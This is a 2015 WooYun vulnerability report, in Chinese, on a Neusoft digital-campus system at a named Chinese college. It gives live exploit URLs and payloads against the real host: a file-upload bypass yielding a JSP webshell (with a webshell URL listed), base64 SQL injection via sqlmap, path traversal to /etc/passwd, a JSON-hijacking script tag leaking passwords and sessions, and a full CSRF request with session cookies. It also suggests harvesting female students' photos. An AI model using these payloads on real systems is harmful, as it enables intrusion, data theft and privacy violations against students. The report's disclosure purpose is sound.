漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-095757
漏洞标题:大红鹰学院高校数字校园解决方案 (上传 csrf xss 文件读取)漏洞集
相关厂商:大红鹰学院
漏洞作者: xsser_w
提交时间:2015-02-05 12:54
修复时间:2015-02-10 12:56
公开时间:2015-02-10 12:56
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-05: 细节已通知厂商并且等待厂商处理中
2015-02-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
东软为中国众多大学提供数字化校园平台、学生一体化应用系统、BI主题应用系统、人力资源系统、数字媒体播放系统等全面解决方案和产品,以帮助高校建立多层次、创新型、开放式的数字化校园,提高高校办学的质量和效益,提升学校核心竞争力。
主要客户包括:华东师范大学、中国人民大学、北京邮电大学、上海外国语大学、中国政法大学等。
详细说明:
前面已经通知厂商有过base64SQL注入 那个。。的确很严重
然后网站有几个任意文件下载和上传 细节是这样的:
1、上传后端未校验 很多高校都用这个吧- -
http://i.nbdhyu.edu.cn/dcp/FileDownLoadloadServlet?module=storage&sName=fileDownload&upload_path=storage-path&folder_id=1837&downloadname=1423103413691.jsp&resource_id=2965
这是一个网盘的上传点,在网盘上传只用了js校验,而且校验有问题,比如上传的是a.jpg.jsp 竟然也不报错 直接就可以上传了。。。。。 这简直就是送shell阿
上传完把鼠标放到链接上,看downloadname参数,知道这个文件的路径就行了,然后 就具体存放的目录是/upload_files/storage/ 所以你访问 http://i.nbdhyu.edu.cn/dcp/upload_files/storage/1423103413691.jsp 就是shell具体地址了
2、SQL注入 如果你忘记了就再提醒下你
http://x.edu.cn/dcp/forward.action?path=/portal/portal&p=personalHomePage&user_id=amcxMDMxMzk=
userid用sqlmap的base64插件就可以跑
3、日志功能处 上传。路径是upload_files/file/message
然后上传完把鼠标放上去,看到文件名就行了 - -
在日志上传也有这样的问题*……&%% 这系统压根就不检查
4、任意文件下载
http://i.nbdhyu.edu.cn/dcp/FileDownLoadloadServlet?module=storage&sName=fileDownload&upload_path=storage-path&folder_id=1837&downloadname=1423103370399.jpg&resource_id=2964
把downloadname换成../../../../../../../../../../../../../../../../../../etc/passwd
5、xss +json劫持
在日志里直接iframe一个我的博客 然后我的博客读取这个接口的数据 竟然可以访问
<script src="http://i.nbdhyu.edu.cn/dcp/portal/gVarInit.jsp?p=wkHomePage&gId=null&user_id=null">
这个接口泄露的信息比较多,里面还有一个password 这个pass不知道是不是加了salt, 后端不会J2EE压根就看不懂源代码对密码是如何加密的。。有时间研究下
这个接口泄露了部分的session和账号姓名。
6、微博csrf
具体的包是这样的
POST /dcp/twitter/twitter.action HTTP/1.1
Host: i.nbdhyu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
render: json
clientType: json
Referer: http://i.nbdhyu.edu.cn/dcp/forward.action?path=/portal/portal&p=twitterHomePage
Content-Length: 406
Content-Type: text/plain; charset=UTF-8
Cookie: key_dcp_v5=LTwkJSRd28vJJGxyt3Bxp5JPF2gcR87pQLPbMqTTlm1HjnpzTylm!1569068406; neusoftbfsudcp=vl2NJMwQ9LV3BvVYjbZTPqKJ1FgsFnJvh3wvZY6PJ9LX7p54BgKv!-1345243717; JSESSIONID=3GK1JTGZvzRP5xpfh3xLtwQTycQV9QR6bt2Pb6QqQ6QQfYBvky2F!2025847817
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"map":{"method":"publishNewTwitter","params":{"javaClass":"java.util.ArrayList","list":[{"javaClass":"com.neusoft.education.dcp.apps.twitter.entity.TwitterBaseInfoEntity","TWITTER_CONTENT":"blog csrf post data test","TWITTER_TIME":{"javaClass":"java.util.Date","time":1423106201443},"TWITTER_TRANS_TIME":0,"USERPHOTO":"xs11此处马赛克168.jpg","PIM_PIC":"","PIM_PICX":""}]}},"javaClass":"java.util.HashMap"}
没token 然后我就把referrer也改了 结果……
返回状态200 true。。
随便csrf 结合上面的接口泄露可以爬全校MM 信息,因为各种参数包括了照片路径,可以根据sex是否为0来worm到女性头像。。。当然 这么多上传问题 随便拿到数据库
这套系统竟然卖了那么多学校 无奈
漏洞证明:
http://www.xsser.net/3.html
http://i.nbdhyu.edu.cn/dcp/forward.action?path=/portal/portal&p=personalHomePage&user_id=amcxMDMxMzk=
http://i.nbdhyu.edu.cn/dcp/upload_files/shell2.jpg.jsp
我们学校只是东团其中一个客户…
修复方案:
好好搞下安全
版权声明:转载请注明来源 xsser_w@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-02-10 12:56
厂商回复:
最新状态:
暂无